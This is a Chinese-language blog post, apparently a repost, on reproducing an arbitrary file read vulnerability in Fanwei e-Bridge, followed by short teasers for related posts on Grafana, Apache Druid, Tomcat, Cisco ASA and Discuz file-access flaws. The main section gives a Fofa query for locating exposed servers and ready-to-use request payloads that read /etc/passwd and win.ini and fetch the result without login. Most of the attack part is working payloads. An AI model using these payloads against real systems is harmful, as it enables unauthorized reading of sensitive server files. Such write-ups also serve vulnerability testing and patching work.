2. 程式人生 > 實用技巧 >泛微雲橋e-Bridge-任意檔案讀取漏洞

泛微雲橋e-Bridge-任意檔案讀取漏洞

阿新 發佈:2020-10-10

1.資產查詢

Fofa: title="泛微雲橋 e-Bridge"

2.漏洞描述

泛微雲橋e-Bridge存在任意檔案讀取漏洞,攻擊者成功利用該漏洞,可實現任意檔案讀取,獲取敏感資訊。

3.漏洞復現

1)Linux伺服器

(1)在URL後新增payload

payload:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

(2)在URL後新增/file/fileNoLogin/上一步返回的id

payload:/file/fileNoLogin/fa38f21af951482bb450d1ce3e6a7b49

2)Windows伺服器

(1)在URL後新增payload

payload :/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt

(2)在URL後新增/file/fileNoLogin/上一步返回的id

payload:/file/fileNoLogin/9ecccbde436e4d3d8d34ef63274d4d4d

相關推薦

e-Bridge-任意檔案讀取漏洞

1.資產查詢 Fofa: title=" e-Bridge" 2.漏洞描述 e-Bridge存在任意檔案讀取漏洞,攻擊者成功利用該漏洞,可實現任意檔案讀取,獲取敏感資訊。

CVE-2020-3452 CISCO ASA遠端任意檔案讀取漏洞

0x01 漏洞描述 Cisco官方 釋出了 Cisco ASA 軟體和 FTD 軟體的 Web 介面存在目錄遍歷導致任意檔案讀取 的風險通告,該漏洞編號為 CVE-2020-3452。 漏洞等級:中危。 通過shadon引擎的搜尋,目前全球大約有210,685個資

Openfire Admin Console SSRF&任意檔案讀取漏洞 CVE-2019-18394 CVE-2019-18393 poc

Openfire(以前稱為Wildfire和Jive Messenger)是一個即時通訊(IM)和群聊伺服器,它使用Java編寫的XMPP伺服器,並以Apache License 2.0釋出。

mysql任意檔案讀取漏洞復現

前言 第一次得知該漏洞後找了一些文章去看。 一開始不明白這個漏洞是怎麼來的,只知道通過在服務端執行poc指令碼就可以讀取客戶端的任意檔案,直接找到網上準備好的靶機進行測試,發現可行,然後就拿別人的poc試驗,

漏洞復現】CVE-2021-36749 Apache Druid LoadData 任意檔案讀取漏洞

0x00 漏洞詳情 由於使用者指定 HTTP InputSource 沒有做出限制,可以通過將檔案 URL 傳遞給 HTTPInputSource 來繞過應用程式級別的限制。攻擊者可利用該漏洞在未授權情況下,構造惡意請求執行檔案讀取,最終造成伺

Apache Druid LoadData 任意檔案讀取漏洞-CVE-2021-36749

漏洞原理: 由於使用者指定 HTTP InputSource 沒有做出限制,可以通過將檔案 URL 傳遞給 HTTP InputSource 來繞過應用程式級別的限制。由於 Apache Druid 預設情況下是缺乏授權認證,攻擊者可利用該漏洞在未授權情況

Grafana 未授權任意檔案讀取漏洞

漏洞原理:   Grafana是一個跨平臺、開源的資料視覺化網路應用程式平臺。使用者配置連線的資料來源之後,Grafana可以在網路瀏覽器裡顯示資料圖表和警告。Grafana 存在未授權任意檔案讀取漏洞,攻擊者在未經身份驗

Grafana 任意檔案讀取漏洞 (CVE-2021-43798)學習

漏洞概述 Grafana是一個跨平臺、開源的資料視覺化網路應用程式平臺。使用者配置連線的資料來源之後,Grafana可以在網路瀏覽器裡顯示資料圖表和警告。

Grafana 任意檔案讀取漏洞(CVE-2021-43798)

Preface   Grafana是一個跨平臺、開源的資料視覺化網路應用程式平臺。使用者配置連線的資料來源之後,Grafana可以在網路瀏覽器裡顯示資料圖表和警告。Grafana 存在未授權任意檔案讀取漏洞,攻擊者在未經身份驗證的

Tomcat任意檔案寫入漏洞

Tomcat任意檔案寫入漏洞 參考連結:https://zhishihezi.net/box/c7ecf406d93ed094559f1cd654950609

Discuz!X ≤3.4 任意檔案刪除漏洞

Discuz!X ≤3.4 任意檔案刪除漏洞 簡述 漏洞原因:之前存在的任意檔案刪除漏洞修復不完全導致可以繞過。

漏洞復現:ActiveMQ任意檔案寫入漏洞(CVE-2016-3088)

一、漏洞描述 該漏洞出現在fileserver應用中,漏洞原理:ActiveMQ中的fileserver服務允許使用者通過HTTP PUT方法上傳檔案到指定目錄。Fileserver支援寫入檔案(不解析jsp),但是支援移動檔案(Move)我們可以將jsp的檔案PU

Apache Ambari 公佈任意檔案下載漏洞

新春現金紅包與免費Linux基金會培訓&認證,等你來領!>>> 近日,Apache 官方公告了一個Apache Ambari 的任意檔案下載漏洞。Ambari的鑑權模組存在設計缺陷,惡意使用者可以繞過身份驗證,通過構

phpcms 9.6.1任意檔案下載漏洞分析

環境: phpstudy本地搭建phpcms apache2.4.39+php5.3.29+mysql8.0.12 漏洞影響版本: PHPCMS 9.6.1

Wordpress <= 4.9.6 任意檔案刪除漏洞

Wordpress <= 4.9.6 任意檔案刪除漏洞 前言 從 3.7.0 版本開始, WordPress 在使用者登入時,會在後臺對小版本的改變進行更新,這樣不利於我們分析程式碼。我們可以通過將 AUTOMATIC_UPDATER_DISABLED 設定成 t

若依(Ruoyi)管理系統後臺sql注入+任意檔案下載漏洞

0x00若依介紹 若依可以用於所有的Web應用程式,如網站管理後臺,網站會員中心,CMS,CRM,OA。所有前端後臺程式碼封裝過後十分精簡易上手,出錯概率低。同時支援移動客戶端訪問。系統會陸續更新一些實用功能。寓意

漏洞復現-CVE-2017-12615-tomcat PUT方法任意檔案寫入漏洞

0x00 實驗環境 攻擊機:Win 10 靶場:docker拉的vulhub靶場 0x01 影響版本 版本:Tomcat 7.x版本內conf/web.xml配置檔案內預設配置無readonly引數,需要手工新增,預設配置條件下不受此漏洞影響。

CVE-2020-10977-GITLAB CE/EE 任意檔案讀取導致遠端命令執行漏洞-環境搭建及完整復現圖文詳細筆記

漏洞環境搭建-CENTOS7 1.安裝依賴軟體 yum -y install policycoreutils openssh-server openssh-clients postfix

Discuz! 任意檔案刪除漏洞重現及分析

0x00 概述 9月29日,Discuz修復了一個前臺任意檔案刪除的漏洞,相似的漏洞曾在2014年被提交給wooyun和discuz官方,但是修復不完全導致了這次的漏洞

Discuz!X ≤3.4 任意檔案刪除漏洞分析

作者:LoRexxar\'@知道創宇404實驗室 發表時間:2017年9月30日 0x01 簡述 Discuz!X社群軟體,是一個採用 PHP 和 MySQL 等其他多種資料庫構建的效能優異、功能全面、安全穩定的社群論壇平臺。